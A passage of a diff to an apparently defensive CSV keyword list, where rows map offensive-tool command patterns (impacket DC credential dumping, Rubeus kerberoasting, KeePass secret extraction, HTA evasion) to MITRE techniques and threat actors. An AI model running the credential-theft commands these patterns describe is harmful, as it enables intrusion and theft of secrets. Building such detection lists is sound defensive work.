T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_load_conf*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_load_conf_db*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_log_format2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_mpi_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_omp_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* 
john_omp_init*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_omp_maybe_adjust_or_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_omp_show_info*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_register_one*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_run*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_set_mpi*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_set_tristates*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* john_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -JMXConsole -AppName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* john_done*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_fork*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load_conf*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load_conf_db*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_log_format2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_mpi_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* 
john_omp_init*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_maybe_adjust_or_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_show_info*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_register_one*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_run*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_set_mpi*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_set_tristates*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* JspShell ua*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" -"* -just-dc-ntlm *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -just-dc-user *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -just-dc-ntlm *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -just-dc-user *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* -just-dc-user 'krbtgt' -dc-ip * -k -no-pass @*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -k * -c *.exe* -p Outlook.Application -o *.hta*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" -"* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"* -k * -c *.exe* -p Outlook.Application -o *.hta*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "* -k --kerberoast*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" -"* -k -request-user * -dc-ip*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -k -request-user * -dc-ip*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* k8gege520 *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* kalilinux/kali-rolling*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 
- Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* kdbof.cpp*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" -"* keepass /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* keepass 
/unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "* KeeTheft.exe*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" -"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* kerberoast /spn:*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "* Kerberoastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --kerberoasting *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* --kerberoasting *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* kerberos asreproast 